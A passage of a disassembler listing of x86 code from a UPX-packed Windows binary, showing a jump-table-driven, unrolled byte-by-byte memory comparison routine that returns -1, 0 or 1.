movzx edx, byte ptr [ecx-14h]
sub esi, edx
jz short loc_402E8B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402E8B: ; CODE XREF: sub_40287E+5F6�j
movzx esi, byte ptr [eax-13h]
movzx edx, byte ptr [ecx-13h]
sub esi, edx
jz short loc_402EAC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402EAC: ; CODE XREF: sub_40287E+617�j
movzx esi, byte ptr [eax-12h]
movzx edx, byte ptr [ecx-12h]
sub esi, edx
jz short loc_402ECD
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402ECD: ; CODE XREF: sub_40287E+638�j
movzx esi, byte ptr [eax-11h]
movzx edx, byte ptr [ecx-11h]
sub esi, edx
jz short loc_402EEA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_402EEA
; ---------------------------------------------------------------------------
loc_402EE8: ; CODE XREF: sub_40287E+5EB�j
xor esi, esi
loc_402EEA: ; CODE XREF: sub_40287E+659�j
; sub_40287E+668�j
test esi, esi
jnz loc_402D4A
loc_402EF2: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-10h] ; jumptable 00402D43 case 16
cmp edx, [ecx-10h]
jz short loc_402F77
movzx esi, dl
movzx edx, byte ptr [ecx-10h]
sub esi, edx
jz short loc_402F1A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402F1A: ; CODE XREF: sub_40287E+685�j
movzx esi, byte ptr [eax-0Fh]
movzx edx, byte ptr [ecx-0Fh]
sub esi, edx
jz short loc_402F3B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402F3B: ; CODE XREF: sub_40287E+6A6�j
movzx esi, byte ptr [eax-0Eh]
movzx edx, byte ptr [ecx-0Eh]
sub esi, edx
jz short loc_402F5C
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402F5C: ; CODE XREF: sub_40287E+6C7�j
movzx esi, byte ptr [eax-0Dh]
movzx edx, byte ptr [ecx-0Dh]
sub esi, edx
jz short loc_402F79
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_402F79
; ---------------------------------------------------------------------------
loc_402F77: ; CODE XREF: sub_40287E+67A�j
xor esi, esi
loc_402F79: ; CODE XREF: sub_40287E+6E8�j
; sub_40287E+6F7�j
test esi, esi
jnz loc_402D4A
loc_402F81: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Ch] ; jumptable 00402D43 case 12
cmp edx, [ecx-0Ch]
jz short loc_403007
movzx edx, byte ptr [ecx-0Ch]
movzx esi, byte ptr [eax-0Ch]
sub esi, edx
jz short loc_402FAA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402FAA: ; CODE XREF: sub_40287E+715�j
movzx esi, byte ptr [eax-0Bh]
movzx edx, byte ptr [ecx-0Bh]
sub esi, edx
jz short loc_402FCB
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402FCB: ; CODE XREF: sub_40287E+736�j
movzx esi, byte ptr [eax-0Ah]
movzx edx, byte ptr [ecx-0Ah]
sub esi, edx
jz short loc_402FEC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402FEC: ; CODE XREF: sub_40287E+757�j
movzx esi, byte ptr [eax-9]
movzx edx, byte ptr [ecx-9]
sub esi, edx
jz short loc_403009
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403009
; ---------------------------------------------------------------------------
loc_403007: ; CODE XREF: sub_40287E+709�j
xor esi, esi
loc_403009: ; CODE XREF: sub_40287E+778�j
; sub_40287E+787�j
test esi, esi
jnz loc_402D4A
loc_403011: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-8] ; jumptable 00402D43 case 8
cmp edx, [ecx-8]
jz short loc_403096
movzx esi, dl
movzx edx, byte ptr [ecx-8]
sub esi, edx
jz short loc_403039
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403039: ; CODE XREF: sub_40287E+7A4�j
movzx esi, byte ptr [eax-7]
movzx edx, byte ptr [ecx-7]
sub esi, edx
jz short loc_40305A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40305A: ; CODE XREF: sub_40287E+7C5�j
movzx esi, byte ptr [eax-6]
movzx edx, byte ptr [ecx-6]
sub esi, edx
jz short loc_40307B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40307B: ; CODE XREF: sub_40287E+7E6�j
movzx esi, byte ptr [eax-5]
movzx edx, byte ptr [ecx-5]
sub esi, edx
jz short loc_403098
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403098
; ---------------------------------------------------------------------------
loc_403096: ; CODE XREF: sub_40287E+799�j
xor esi, esi
loc_403098: ; CODE XREF: sub_40287E+807�j
; sub_40287E+816�j
test esi, esi
jnz loc_402D4A
loc_4030A0: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-4] ; jumptable 00402D43 case 4
cmp edx, [ecx-4]
jz short loc_403117
movzx esi, dl
movzx edx, byte ptr [ecx-4]
sub esi, edx
jz short loc_4030C2
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
test edx, edx
jnz short loc_4030F8
loc_4030C2: ; CODE XREF: sub_40287E+833�j
movzx esi, byte ptr [eax-3]
movzx edx, byte ptr [ecx-3]
sub esi, edx
jz short loc_4030DD
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
test edx, edx
jnz short loc_4030F8
loc_4030DD: ; CODE XREF: sub_40287E+84E�j
movzx esi, byte ptr [eax-2]
movzx edx, byte ptr [ecx-2]
sub esi, edx
jz short loc_4030FC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
test edx, edx
jz short loc_4030FC
loc_4030F8: ; CODE XREF: sub_40287E+842�j
; sub_40287E+85D�j
mov eax, edx
jmp short loc_403119
; ---------------------------------------------------------------------------
loc_4030FC: ; CODE XREF: sub_40287E+869�j
; sub_40287E+878�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
sub eax, ecx
jz short loc_403119
xor ecx, ecx
test eax, eax
setnle cl
lea ecx, [ecx+ecx-1]
mov eax, ecx
jmp short loc_403119
; ---------------------------------------------------------------------------
loc_403117: ; CODE XREF: sub_40287E+828�j
xor eax, eax
loc_403119: ; CODE XREF: sub_40287E+87C�j
; sub_40287E+888�j ...
test eax, eax
jnz short loc_40311F
loc_40311D: ; CODE XREF: sub_40287E+4BF�j
; sub_40287E+4C5�j ...
xor eax, eax ; default
; jumptable 00402D43 case 0
loc_40311F: ; CODE XREF: sub_40287E+4CE�j
; sub_40287E+89D�j ...
pop ebx
jmp loc_403E78
; ---------------------------------------------------------------------------
loc_403125: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Dh] ; jumptable 00402D43 case 29
cmp edx, [ecx-1Dh]
jz short loc_4031AA
movzx esi, dl
movzx edx, byte ptr [ecx-1Dh]
sub esi, edx
jz short loc_40314D
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40314D: ; CODE XREF: sub_40287E+8B8�j
movzx esi, byte ptr [eax-1Ch]
movzx edx, byte ptr [ecx-1Ch]
sub esi, edx
jz short loc_40316E
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40316E: ; CODE XREF: sub_40287E+8D9�j
movzx esi, byte ptr [eax-1Bh]
movzx edx, byte ptr [ecx-1Bh]
sub esi, edx
jz short loc_40318F
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40318F: ; CODE XREF: sub_40287E+8FA�j
movzx esi, byte ptr [eax-1Ah]
movzx edx, byte ptr [ecx-1Ah]
sub esi, edx
jz short loc_4031AC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4031AC
; ---------------------------------------------------------------------------
loc_4031AA: ; CODE XREF: sub_40287E+8AD�j
xor esi, esi
loc_4031AC: ; CODE XREF: sub_40287E+91B�j
; sub_40287E+92A�j
test esi, esi
jnz loc_402D4A
loc_4031B4: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-19h] ; jumptable 00402D43 case 25
cmp edx, [ecx-19h]
jz short loc_403239
movzx esi, dl
movzx edx, byte ptr [ecx-19h]
sub esi, edx
jz short loc_4031DC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4031DC: ; CODE XREF: sub_40287E+947�j
movzx esi, byte ptr [eax-18h]
movzx edx, byte ptr [ecx-18h]
sub esi, edx
jz short loc_4031FD
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4031FD: ; CODE XREF: sub_40287E+968�j
movzx esi, byte ptr [eax-17h]
movzx edx, byte ptr [ecx-17h]
sub esi, edx
jz short loc_40321E
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40321E: ; CODE XREF: sub_40287E+989�j
movzx esi, byte ptr [eax-16h]
movzx edx, byte ptr [ecx-16h]
sub esi, edx
jz short loc_40323B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_40323B
; ---------------------------------------------------------------------------
loc_403239: ; CODE XREF: sub_40287E+93C�j
xor esi, esi
loc_40323B: ; CODE XREF: sub_40287E+9AA�j
; sub_40287E+9B9�j
test esi, esi
jnz loc_402D4A
loc_403243: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-15h] ; jumptable 00402D43 case 21
cmp edx, [ecx-15h]
jz short loc_4032C8
movzx esi, dl
movzx edx, byte ptr [ecx-15h]
sub esi, edx
jz short loc_40326B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40326B: ; CODE XREF: sub_40287E+9D6�j
movzx esi, byte ptr [eax-14h]
movzx edx, byte ptr [ecx-14h]
sub esi, edx
jz short loc_40328C
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40328C: ; CODE XREF: sub_40287E+9F7�j
movzx esi, byte ptr [eax-13h]
movzx edx, byte ptr [ecx-13h]
sub esi, edx
jz short loc_4032AD
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4032AD: ; CODE XREF: sub_40287E+A18�j
movzx esi, byte ptr [eax-12h]
movzx edx, byte ptr [ecx-12h]
sub esi, edx
jz short loc_4032CA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4032CA
; ---------------------------------------------------------------------------
loc_4032C8: ; CODE XREF: sub_40287E+9CB�j
xor esi, esi
loc_4032CA: ; CODE XREF: sub_40287E+A39�j
; sub_40287E+A48�j
test esi, esi
jnz loc_402D4A
loc_4032D2: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-11h] ; jumptable 00402D43 case 17
cmp edx, [ecx-11h]
jz short loc_403357
movzx esi, dl
movzx edx, byte ptr [ecx-11h]
sub esi, edx
jz short loc_4032FA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4032FA: ; CODE XREF: sub_40287E+A65�j
movzx esi, byte ptr [eax-10h]
movzx edx, byte ptr [ecx-10h]
sub esi, edx
jz short loc_40331B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40331B: ; CODE XREF: sub_40287E+A86�j
movzx esi, byte ptr [eax-0Fh]
movzx edx, byte ptr [ecx-0Fh]
sub esi, edx
jz short loc_40333C
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40333C: ; CODE XREF: sub_40287E+AA7�j
movzx esi, byte ptr [eax-0Eh]
movzx edx, byte ptr [ecx-0Eh]
sub esi, edx
jz short loc_403359
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403359
; ---------------------------------------------------------------------------
loc_403357: ; CODE XREF: sub_40287E+A5A�j
xor esi, esi
loc_403359: ; CODE XREF: sub_40287E+AC8�j
; sub_40287E+AD7�j
test esi, esi
jnz loc_402D4A
loc_403361: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Dh] ; jumptable 00402D43 case 13
cmp edx, [ecx-0Dh]
jz short loc_4033E6
movzx esi, dl
movzx edx, byte ptr [ecx-0Dh]
sub esi, edx
jz short loc_403389
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403389: ; CODE XREF: sub_40287E+AF4�j
movzx esi, byte ptr [eax-0Ch]
movzx edx, byte ptr [ecx-0Ch]
sub esi, edx
jz short loc_4033AA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4033AA: ; CODE XREF: sub_40287E+B15�j
movzx esi, byte ptr [eax-0Bh]
movzx edx, byte ptr [ecx-0Bh]
sub esi, edx
jz short loc_4033CB
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4033CB: ; CODE XREF: sub_40287E+B36�j
movzx esi, byte ptr [eax-0Ah]
movzx edx, byte ptr [ecx-0Ah]
sub esi, edx
jz short loc_4033E8
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4033E8
; ---------------------------------------------------------------------------
loc_4033E6: ; CODE XREF: sub_40287E+AE9�j
xor esi, esi
loc_4033E8: ; CODE XREF: sub_40287E+B57�j
; sub_40287E+B66�j
test esi, esi
jnz loc_402D4A
loc_4033F0: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-9] ; jumptable 00402D43 case 9
cmp edx, [ecx-9]
jz short loc_403476
movzx edx, byte ptr [ecx-9]
movzx esi, byte ptr [eax-9]
sub esi, edx
jz short loc_403419
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403419: ; CODE XREF: sub_40287E+B84�j
movzx esi, byte ptr [eax-8]
movzx edx, byte ptr [ecx-8]
sub esi, edx
jz short loc_40343A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40343A: ; CODE XREF: sub_40287E+BA5�j
movzx esi, byte ptr [eax-7]
movzx edx, byte ptr [ecx-7]
sub esi, edx
jz short loc_40345B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40345B: ; CODE XREF: sub_40287E+BC6�j
movzx esi, byte ptr [eax-6]
movzx edx, byte ptr [ecx-6]
sub esi, edx
jz short loc_403478
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403478
; ---------------------------------------------------------------------------
loc_403476: ; CODE XREF: sub_40287E+B78�j
xor esi, esi
loc_403478: ; CODE XREF: sub_40287E+BE7�j
; sub_40287E+BF6�j
test esi, esi
jnz loc_402D4A
loc_403480: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-5] ; jumptable 00402D43 case 5
cmp edx, [ecx-5]
jz short loc_403505
movzx esi, dl
movzx edx, byte ptr [ecx-5]
sub esi, edx
jz short loc_4034A8
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4034A8: ; CODE XREF: sub_40287E+C13�j
movzx esi, byte ptr [eax-4]
movzx edx, byte ptr [ecx-4]
sub esi, edx
jz short loc_4034C9
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4034C9: ; CODE XREF: sub_40287E+C34�j
movzx esi, byte ptr [eax-3]
movzx edx, byte ptr [ecx-3]
sub esi, edx
jz short loc_4034EA
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4034EA: ; CODE XREF: sub_40287E+C55�j
movzx esi, byte ptr [eax-2]
movzx edx, byte ptr [ecx-2]
sub esi, edx
jz short loc_403507
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403507
; ---------------------------------------------------------------------------
loc_403505: ; CODE XREF: sub_40287E+C08�j
xor esi, esi
loc_403507: ; CODE XREF: sub_40287E+C76�j
; sub_40287E+C85�j
test esi, esi
jnz loc_402D4A
loc_40350F: ; CODE XREF: sub_40287E+4C5�j
; sub_40287E+10B5�j ...
movzx ecx, byte ptr [ecx-1] ; jumptable 00402D43 case 1
movzx eax, byte ptr [eax-1]
sub eax, ecx
jz loc_40311F
xor ecx, ecx
test eax, eax
setnle cl
lea ecx, [ecx+ecx-1]
mov eax, ecx
jmp loc_40311F
; ---------------------------------------------------------------------------
loc_403531: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Eh] ; jumptable 00402D43 case 30
cmp edx, [ecx-1Eh]
jz short loc_4035B6
movzx esi, dl
movzx edx, byte ptr [ecx-1Eh]
sub esi, edx
jz short loc_403559
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403559: ; CODE XREF: sub_40287E+CC4�j
movzx esi, byte ptr [eax-1Dh]
movzx edx, byte ptr [ecx-1Dh]
sub esi, edx
jz short loc_40357A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40357A: ; CODE XREF: sub_40287E+CE5�j
movzx esi, byte ptr [eax-1Ch]
movzx edx, byte ptr [ecx-1Ch]
sub esi, edx
jz short loc_40359B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40359B: ; CODE XREF: sub_40287E+D06�j
movzx esi, byte ptr [eax-1Bh]
movzx edx, byte ptr [ecx-1Bh]
sub esi, edx
jz short loc_4035B8
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4035B8
; ---------------------------------------------------------------------------
loc_4035B6: ; CODE XREF: sub_40287E+CB9�j
xor esi, esi
loc_4035B8: ; CODE XREF: sub_40287E+D27�j
; sub_40287E+D36�j
test esi, esi
jnz loc_402D4A
loc_4035C0: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Ah] ; jumptable 00402D43 case 26
cmp edx, [ecx-1Ah]
jz short loc_403645
movzx esi, dl
movzx edx, byte ptr [ecx-1Ah]
sub esi, edx
jz short loc_4035E8
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4035E8: ; CODE XREF: sub_40287E+D53�j
movzx esi, byte ptr [eax-19h]
movzx edx, byte ptr [ecx-19h]
sub esi, edx
jz short loc_403609
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403609: ; CODE XREF: sub_40287E+D74�j
movzx esi, byte ptr [eax-18h]
movzx edx, byte ptr [ecx-18h]
sub esi, edx
jz short loc_40362A
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_40362A: ; CODE XREF: sub_40287E+D95�j
movzx esi, byte ptr [eax-17h]
movzx edx, byte ptr [ecx-17h]
sub esi, edx
jz short loc_403647
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403647
; ---------------------------------------------------------------------------
loc_403645: ; CODE XREF: sub_40287E+D48�j
xor esi, esi
loc_403647: ; CODE XREF: sub_40287E+DB6�j
; sub_40287E+DC5�j
test esi, esi
jnz loc_402D4A
loc_40364F: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-16h] ; jumptable 00402D43 case 22
cmp edx, [ecx-16h]
jz short loc_4036D4
movzx esi, dl
movzx edx, byte ptr [ecx-16h]
sub esi, edx
jz short loc_403677
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403677: ; CODE XREF: sub_40287E+DE2�j
movzx esi, byte ptr [eax-15h]
movzx edx, byte ptr [ecx-15h]
sub esi, edx
jz short loc_403698
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403698: ; CODE XREF: sub_40287E+E03�j
movzx esi, byte ptr [eax-14h]
movzx edx, byte ptr [ecx-14h]
sub esi, edx
jz short loc_4036B9
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4036B9: ; CODE XREF: sub_40287E+E24�j
movzx esi, byte ptr [eax-13h]
movzx edx, byte ptr [ecx-13h]
sub esi, edx
jz short loc_4036D6
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4036D6
; ---------------------------------------------------------------------------
loc_4036D4: ; CODE XREF: sub_40287E+DD7�j
xor esi, esi
loc_4036D6: ; CODE XREF: sub_40287E+E45�j
; sub_40287E+E54�j
test esi, esi
jnz loc_402D4A
loc_4036DE: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-12h] ; jumptable 00402D43 case 18
cmp edx, [ecx-12h]
jz short loc_403763
movzx esi, dl
movzx edx, byte ptr [ecx-12h]
sub esi, edx
jz short loc_403706
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403706: ; CODE XREF: sub_40287E+E71�j
movzx esi, byte ptr [eax-11h]
movzx edx, byte ptr [ecx-11h]
sub esi, edx
jz short loc_403727
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403727: ; CODE XREF: sub_40287E+E92�j
movzx esi, byte ptr [eax-10h]
movzx edx, byte ptr [ecx-10h]
sub esi, edx
jz short loc_403748
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403748: ; CODE XREF: sub_40287E+EB3�j
movzx esi, byte ptr [eax-0Fh]
movzx edx, byte ptr [ecx-0Fh]
sub esi, edx
jz short loc_403765
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403765
; ---------------------------------------------------------------------------
loc_403763: ; CODE XREF: sub_40287E+E66�j
xor esi, esi
loc_403765: ; CODE XREF: sub_40287E+ED4�j
; sub_40287E+EE3�j
test esi, esi
jnz loc_402D4A
loc_40376D: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Eh] ; jumptable 00402D43 case 14
cmp edx, [ecx-0Eh]
jz short loc_4037F2
movzx esi, dl
movzx edx, byte ptr [ecx-0Eh]
sub esi, edx
jz short loc_403795
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403795: ; CODE XREF: sub_40287E+F00�j
movzx esi, byte ptr [eax-0Dh]
movzx edx, byte ptr [ecx-0Dh]
sub esi, edx
jz short loc_4037B6
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4037B6: ; CODE XREF: sub_40287E+F21�j
movzx esi, byte ptr [eax-0Ch]
movzx edx, byte ptr [ecx-0Ch]
sub esi, edx
jz short loc_4037D7
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4037D7: ; CODE XREF: sub_40287E+F42�j
movzx esi, byte ptr [eax-0Bh]
movzx edx, byte ptr [ecx-0Bh]
sub esi, edx
jz short loc_4037F4
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_4037F4
; ---------------------------------------------------------------------------
loc_4037F2: ; CODE XREF: sub_40287E+EF5�j
xor esi, esi
loc_4037F4: ; CODE XREF: sub_40287E+F63�j
; sub_40287E+F72�j
test esi, esi
jnz loc_402D4A
loc_4037FC: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-0Ah] ; jumptable 00402D43 case 10
cmp edx, [ecx-0Ah]
jz short loc_403882
movzx edx, byte ptr [ecx-0Ah]
movzx esi, byte ptr [eax-0Ah]
sub esi, edx
jz short loc_403825
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403825: ; CODE XREF: sub_40287E+F90�j
movzx edx, byte ptr [ecx-9]
movzx esi, byte ptr [eax-9]
sub esi, edx
jz short loc_403846
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403846: ; CODE XREF: sub_40287E+FB1�j
movzx edx, byte ptr [ecx-8]
movzx esi, byte ptr [eax-8]
sub esi, edx
jz short loc_403867
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_403867: ; CODE XREF: sub_40287E+FD2�j
movzx edx, byte ptr [ecx-7]
movzx esi, byte ptr [eax-7]
sub esi, edx
jz short loc_403884
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403884
; ---------------------------------------------------------------------------
loc_403882: ; CODE XREF: sub_40287E+F84�j
xor esi, esi
loc_403884: ; CODE XREF: sub_40287E+FF3�j
; sub_40287E+1002�j
test esi, esi
jnz loc_402D4A
loc_40388C: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-6] ; jumptable 00402D43 case 6
cmp edx, [ecx-6]
jz short loc_403911
movzx esi, dl
movzx edx, byte ptr [ecx-6]
sub esi, edx
jz short loc_4038B4
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4038B4: ; CODE XREF: sub_40287E+101F�j
movzx esi, byte ptr [eax-5]
movzx edx, byte ptr [ecx-5]
sub esi, edx
jz short loc_4038D5
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4038D5: ; CODE XREF: sub_40287E+1040�j
movzx esi, byte ptr [eax-4]
movzx edx, byte ptr [ecx-4]
sub esi, edx
jz short loc_4038F6
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_4038F6: ; CODE XREF: sub_40287E+1061�j
movzx esi, byte ptr [eax-3]
movzx edx, byte ptr [ecx-3]
sub esi, edx
jz short loc_403913
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_403913
; ---------------------------------------------------------------------------
loc_403911: ; CODE XREF: sub_40287E+1014�j
xor esi, esi
loc_403913: ; CODE XREF: sub_40287E+1082�j
; sub_40287E+1091�j
test esi, esi
jnz loc_402D4A
loc_40391B: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov dx, [eax-2] ; jumptable 00402D43 case 2
cmp dx, [ecx-2]
jz loc_40311D ; default
; jumptable 00402D43 case 0
loc_403929: ; CODE XREF: sub_40287E+14C8�j
; sub_40287E+14DB�j
